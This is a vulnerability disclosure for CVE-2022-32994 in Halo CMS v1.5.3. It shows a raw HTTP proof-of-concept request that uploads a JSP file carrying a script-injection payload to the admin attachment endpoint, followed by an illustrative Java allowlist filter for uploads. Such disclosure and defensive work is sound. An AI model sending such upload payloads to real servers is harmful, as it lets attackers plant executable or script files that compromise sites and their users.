
CVE-2022-32994: Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload · Issue #1 · zongdeiqianxing/cve-reports

Halo CMS v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the component /api/admin/attachments/upload.


https://github.com/halo-dev/halo/

Halo CMS v1.5.3 has an arbitrary-format file upload vulnerability at /api/admin/attachments/upload. Attackers can upload files in formats such as JSP and HTML.

Proof of Concept

POST /api/admin/attachments/upload HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 219
Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFxTUuVBMVJqfHQHX
Origin: http://127.0.0.1:8090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node04b75v93fl79m6b5ujcpwcvp82.node0
Connection: close

------WebKitFormBoundaryFxTUuVBMVJqfHQHX
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: application/octet-stream

1<script>alert(1)</script>
------WebKitFormBoundaryFxTUuVBMVJqfHQHX--

Permalink: AttachmentServiceImpl.java L110
The relevant code performs no security check.
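
The kind of server-side check the upload path lacks, as an added example (not Halo's code and not the project's actual fix). The class name UploadNameFilter, the method storageName and the allowlist contents are hypothetical assumptions.

```java
import java.util.Locale;
import java.util.Optional;
import java.util.Set;
import java.util.UUID;

/** Hypothetical upload filter; illustrative only, not Halo's code. */
public class UploadNameFilter {
    // Assumed policy: only these attachment types are accepted.
    private static final Set<String> ALLOWED =
            Set.of("png", "jpg", "jpeg", "gif", "pdf", "txt");

    /**
     * Returns the server-chosen storage name for an accepted upload,
     * or empty if the client-supplied filename must be rejected.
     */
    static Optional<String> storageName(String clientName) {
        if (clientName == null || clientName.indexOf('\0') >= 0) {
            return Optional.empty();
        }
        // Drop any directory part the client sent (both separator styles).
        String base = clientName.substring(
                Math.max(clientName.lastIndexOf('/'), clientName.lastIndexOf('\\')) + 1);
        // Windows strips trailing dots and spaces, so "2.jsp." would land as "2.jsp".
        base = base.replaceAll("[. ]+$", "");
        int dot = base.lastIndexOf('.');
        if (dot <= 0) {
            return Optional.empty(); // no extension, or a dot-file
        }
        String ext = base.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED.contains(ext)) {
            return Optional.empty(); // jsp, html and anything else not listed
        }
        // Never reuse the client's name on disk; keep only the vetted extension.
        return Optional.of(UUID.randomUUID() + "." + ext);
    }

    public static void main(String[] args) {
        // Constructed sample names; "2.jsp" is the filename from the request above.
        String[] samples = {"2.jsp", "page.html", "photo.PNG", "2.jsp.",
                            "..\\..\\x.Jsp", "report.pdf", "noext"};
        for (String s : samples) {
            System.out.printf("%-14s -> %s%n", s,
                    storageName(s).map(n -> "accept as " + n).orElse("reject"));
        }
    }
}
```

The check has to run on the server before the file is written, since the filename and Content-Type in the multipart body are both client-controlled.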
